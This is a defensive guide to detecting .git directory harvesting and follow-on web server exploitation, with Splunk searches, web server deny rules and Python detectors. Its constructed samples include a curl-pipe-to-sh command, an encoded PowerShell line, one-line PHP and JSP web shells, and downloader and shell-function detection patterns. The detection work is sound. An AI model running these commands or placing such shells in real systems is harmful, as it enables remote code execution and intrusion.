Detection and Containment Strategies
Detecting .git Folder Harvesting in Server Logs
Security operations centers can run the following Splunk search to surface HTTP requests aimed at hidden Git structures. The OR clause is parenthesized deliberately: SPL evaluates AND before OR, so without the parentheses the index constraint would apply only to the first pattern and the second pattern would match across every index the user is allowed to search:
index=web_logs (uri_path="*/.git/*" OR uri_path="*/.git") | stats count by src_ip, uri_path, status, user_agent
This search identifies external clients attempting to read Git metadata such as .git/HEAD, .git/config or .git/index. Read the status column carefully: a 403 or 404 means the probe was blocked, while a 200 on any .git path means the repository is actually being served and the containment steps below apply immediately. In a standard production environment such requests should never succeed and should be blocked at the web application firewall (WAF) or web server level. Scanners also percent-encode the leading dot (/%2Egit/HEAD); if your log source keeps the raw, undecoded path, add that variant to the search so encoded probes are not missed.
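The same detection, run offline over sample access-log lines, as an added example that is not part of the original page. It parses combined log format (the Nginx/Apache default), percent-decodes the path before matching so an encoded /%2Egit/HEAD probe is not missed, and separates blocked probes (403/404) from confirmed exposure (2xx). The log lines, IP addresses and user agents are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample traffic in combined log format (not real log data); the
# source addresses are taken from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2024:08:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"
203.0.113.7 - - [10/May/2024:08:01:03 +0000] "GET /.git/config HTTP/1.1" 200 310 "-" "python-requests/2.31"
203.0.113.7 - - [10/May/2024:08:01:04 +0000] "GET /.git/index HTTP/1.1" 200 88213 "-" "python-requests/2.31"
198.51.100.9 - - [10/May/2024:08:05:10 +0000] "GET /%2Egit/HEAD HTTP/1.1" 403 153 "-" "curl/8.4.0"
198.51.100.9 - - [10/May/2024:08:05:11 +0000] "GET /app/.git HTTP/1.1" 404 162 "-" "curl/8.4.0"
192.0.2.44 - - [10/May/2024:08:06:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [10/May/2024:08:06:01 +0000] "GET /blog/gitlab-migration HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src_ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<user_agent>[^"]*)"$'
)

# A path segment that is exactly ".git", at the root or below, with or without
# content beneath it: /.git, /.git/HEAD, /app/.git/objects/ab/cd all match,
# while /blog/gitlab-migration does not.
GIT_PATH_RE = re.compile(r'(^|/)\.git(/|$)')

def is_git_probe(uri):
    """True when the request targets a .git directory or anything inside it.
    The query string is dropped and the path percent-decoded first, so
    /%2Egit/HEAD and /.git/HEAD?x=1 are both caught."""
    path = unquote(uri.split('?', 1)[0])
    return GIT_PATH_RE.search(path) is not None

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_git_probes(log_text):
    """Return one record per request that targets .git. A 2xx status means the
    repository is actually being served; 403/404 means the probe was blocked."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_git_probe(rec['uri']):
            rec['status'] = int(rec['status'])
            rec['exposed'] = 200 <= rec['status'] < 300
            hits.append(rec)
    return hits

def summarize(hits):
    """Equivalent of `stats count by src_ip, status`, plus the list of sources
    that actually received repository content."""
    by_src = Counter((h['src_ip'], h['status']) for h in hits)
    exposed_sources = sorted({h['src_ip'] for h in hits if h['exposed']})
    return by_src, exposed_sources

if __name__ == '__main__':
    hits = find_git_probes(SAMPLE_LOG)
    counts, exposed = summarize(hits)
    for (src, status), n in sorted(counts.items()):
        print(f'{src:15} status={status} count={n}')
    print('sources that received repository content:', exposed)
```

On the sample data the script reports three 200 responses to 203.0.113.7 (a confirmed download of HEAD, config and index, i.e. enough to reconstruct the repository) and two blocked probes from 198.51.100.9. The decoded-path check is the part most often missing from a WAF rule written against the literal string "/.git".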
Detecting Post-Exploitation Execution
To detect Remote Code Execution that follows from exploitation of the leaked source, monitor the web server host for anomalous process lineage. A web server or application worker (w3wp.exe for IIS, httpd or nginx, a php-fpm or php-cgi worker) spawning a command interpreter such as cmd.exe, PowerShell or sh is a high-confidence indicator of active exploitation. The search below uses Sysmon Event ID 1 (process creation) with the Splunk CIM field names; the exact field names depend on the add-on that ingests the events. The Linux process names are included because the same lineage applies there. Tomcat is not listed by image name because it runs as java, so scope it by command line in your own environment. Some applications legitimately shell out (image conversion, mail delivery through sendmail), so baseline those parent/child pairs and allowlist them explicitly rather than weakening the rule:
index=security event_id=1 parent_process_name IN ("w3wp.exe", "httpd.exe", "httpd", "apache2", "nginx.exe", "nginx", "php-cgi.exe", "php-fpm") process_name IN ("cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "dash") | table _time, host, parent_process_name, process_name, command_line
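The same lineage check applied to constructed process-creation events, as an added example that is not part of the original page. It normalizes Windows and Linux image paths to a comparable name (so w3wp.exe and /usr/sbin/php-fpm8.2 both resolve correctly), supports an explicit allowlist for baselined parent/child pairs, and raises the severity when the child command line carries an encoded PowerShell payload or a download-and-run pattern. The events, host names and command lines are constructed; the field names follow Sysmon's ParentImage/Image/CommandLine.

```python
import re

# Parent images that indicate a web server or application worker. Matched by
# prefix so versioned binaries such as php-fpm8.2 are covered. Tomcat runs as
# java and is deliberately left out; match it on command line in your environment.
WEB_SERVER_PREFIXES = ("w3wp", "httpd", "apache2", "nginx", "php-cgi", "php-fpm")
SHELLS = {"cmd", "powershell", "pwsh", "bash", "sh", "dash"}
# Command-line markers that raise severity: encoded PowerShell or download-and-run.
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
DOWNLOADERS = ("curl ", "wget ", "certutil", "invoke-webrequest", "iwr ", "downloadstring")

def image_name(image):
    """Lowercase basename without .exe so Windows and Linux paths compare alike."""
    base = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base

def is_web_server(image):
    return image_name(image).startswith(WEB_SERVER_PREFIXES)

def severity(command_line):
    cl = command_line.lower()
    if ENCODED_FLAGS & set(cl.split()) or any(d in cl for d in DOWNLOADERS):
        return "high"
    return "medium"

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "web01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"host": "web02", "ParentImage": "/usr/sbin/php-fpm8.2",
     "Image": "/bin/sh", "CommandLine": 'sh -c "curl http://203.0.113.7/x.sh | sh"'},
    {"host": "web02", "ParentImage": "/usr/sbin/nginx",
     "Image": "/usr/sbin/nginx", "CommandLine": "nginx: worker process"},
    {"host": "web01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"host": "web03", "ParentImage": "/usr/sbin/php-fpm8.2",
     "Image": "/usr/bin/convert", "CommandLine": "convert in.png out.jpg"},
    {"host": "web01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA"},
]

def detect_shell_from_webserver(events, allowlist=frozenset()):
    """Flag events where a web server worker spawns a shell. allowlist holds
    (parent, child) pairs of normalized names baselined as legitimate, for
    example a PHP app that runs sh for mail delivery; keep it explicit and short."""
    alerts = []
    for ev in events:
        parent, child = image_name(ev["ParentImage"]), image_name(ev["Image"])
        if not is_web_server(ev["ParentImage"]) or child not in SHELLS:
            continue
        if (parent, child) in allowlist:
            continue
        alerts.append({"host": ev["host"], "parent": parent, "child": child,
                       "severity": severity(ev["CommandLine"]),
                       "command_line": ev["CommandLine"]})
    return alerts

if __name__ == "__main__":
    for a in detect_shell_from_webserver(SAMPLE_EVENTS):
        print(f'{a["severity"]:6} {a["host"]} {a["parent"]} -> {a["child"]}: {a["command_line"]}')
```

Of the six constructed events, three alert: w3wp spawning cmd (medium), php-fpm spawning sh with a curl pipeline (high) and w3wp spawning encoded PowerShell (high). The php-fpm-to-convert event is the benign shell-out case the caveat above describes; it is not a shell and is ignored, and an allowlist entry handles the case where an application genuinely needs sh.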
Containment and Remediation Guidance
If an exposed Git directory is discovered on a production system, security teams must assume that the entire application source code and every credential embedded anywhere in its history have been compromised. Before changing any configuration, preserve the web server access logs so the exposure window and the clients that downloaded the repository can be scoped. Then execute the following steps immediately:
Block Directory Access: add directory-blocking rules to the active web server configuration, and remove the .git directory from the document root (deploying from an exported archive rather than a checkout prevents it from returning). For Nginx, deny all access to .git paths; the regex below also catches .gitignore and .gitattributes, which should not be served either. Place this block before any other regex location such as the usual location ~ \.php$, because Nginx uses the first matching regex location, so otherwise a request for /.git/x.php would be handed to PHP instead of denied. Be aware that deny all answers 403, which confirms the directory exists; return 404 hides it, as the Apache rule below does. Note also that access_log off silences exactly the requests the detection search above relies on, so drop that line if the web logs are your detection source:
location ~ /\.git {
deny all;
access_log off;
log_not_found off;
}
For Apache, use a mod_alias RedirectMatch directive (this is not a mod_rewrite rule and needs no RewriteEngine). Put it in the server or virtual host configuration rather than in .htaccess: it then works regardless of AllowOverride, and a .htaccess file in the web root is itself something an attacker with write access can alter. The pattern requires a trailing slash, so it covers the directory and everything beneath it (a bare /.git is redirected to /.git/ by DirectorySlash and then matched); add a FilesMatch rule for dotfiles if .gitignore and similar files are also present in the web root:
RedirectMatch 404 /\.(git|github|svn|hg)/
Rotate All Credentials: every credential that appears anywhere in the commit history must be treated as exposed, including secrets that were removed in a later commit, because the original objects remain in the repository and are recovered by any .git harvesting tool. Immediately rotate all database passwords, session signing keys, API tokens and encryption secrets referenced in the source history. Rewriting or purging history is not a substitute for rotation.
Conduct Web Root Audits: scan the production web directory for unauthorized modifications or newly created files (especially web shells with .php, .aspx or .jsp extensions) written during the suspected compromise window. Compare the tree against the deployment artifact rather than trusting timestamps alone: mtime can be forged with touch, so check ctime as well, and scan file contents for web shell indicators regardless of timestamp. Pay particular attention to upload, cache and temporary directories that the application can write to.
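A stand-alone web root audit covering the points above, as an added example that is not part of the original page. It walks a directory tree and reports three things: .git directories that should not be in a document root, files whose mtime falls inside the look-back window, and executable files whose content matches a web shell pattern. The content scan is applied to every file regardless of timestamp, which is what catches the constructed cache.php whose mtime was backdated. The sample web root, its file names and contents are constructed by the script in a temporary directory; the shell patterns are heuristics and every hit needs manual review.

```python
import os
import re
import tempfile
import time

# Heuristic indicators of PHP / JSP / ASPX web shells. Hits need manual review.
SHELL_PATTERNS = [
    re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)", re.I),
    re.compile(rb"\b(system|passthru|shell_exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I),
    re.compile(rb"\$_(GET|POST|REQUEST)\[[^\]]+\]\s*\(\s*\$_(GET|POST|REQUEST)", re.I),
    re.compile(rb"Runtime\.getRuntime\(\)\.exec\s*\(", re.I),
    re.compile(rb"\bProcess\.Start\s*\(|ProcessStartInfo", re.I),
]
EXEC_EXT = {".php", ".phtml", ".php5", ".phar", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}

def audit_webroot(root, window_seconds):
    """Report .git directories, files modified within the look-back window, and
    executable files matching a web shell pattern. The content scan ignores
    timestamps because an attacker can forge mtime with touch; in production
    also compare ctime, which touch cannot set."""
    since = time.time() - window_seconds
    findings = {"git_dirs": [], "recent": [], "shell_indicators": []}
    for dirpath, dirnames, filenames in os.walk(root):
        if ".git" in dirnames:
            rel_git = os.path.relpath(os.path.join(dirpath, ".git"), root)
            findings["git_dirs"].append(rel_git.replace(os.sep, "/"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if os.stat(path).st_mtime >= since:
                findings["recent"].append(rel)
            if os.path.splitext(name)[1].lower() in EXEC_EXT:
                with open(path, "rb") as fh:
                    data = fh.read()
                for pat in SHELL_PATTERNS:
                    if pat.search(data):
                        findings["shell_indicators"].append((rel, pat.pattern.decode()))
                        break
    for key in findings:
        findings[key].sort()
    return findings

def build_sample_webroot():
    """Constructed sample web root in a temp directory (not real data). cache.php
    is a web shell with a backdated mtime; img.jsp is a freshly written one."""
    root = tempfile.mkdtemp(prefix="webroot_")
    now = time.time()
    old = now - 30 * 86400
    files = {
        "index.php": (b"<?php echo 'hello'; ?>\n", old),
        "assets/site.css": (b"body{margin:0}\n", now),
        "uploads/cache.php": (b"<?php @eval(base64_decode($_POST['x'])); ?>\n", old),
        "uploads/img.jsp": (b'<% Runtime.getRuntime().exec(request.getParameter("c")); %>\n', now),
        ".git/HEAD": (b"ref: refs/heads/main\n", old),
    }
    for rel, (data, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.utime(path, (mtime, mtime))
    return root

if __name__ == "__main__":
    findings = audit_webroot(build_sample_webroot(), window_seconds=86400)
    for key, items in findings.items():
        print(f"{key}:")
        for item in items:
            print("   ", item)
```

With a one-day window the audit lists the .git directory, the two files written within the window (site.css and img.jsp) and both web shells. cache.php does not appear in the recent list because its mtime was backdated, which is why the content scan must not be limited to recently modified files. In a real engagement, replace the constructed root with the document root and diff the recent list against the last deployment manifest.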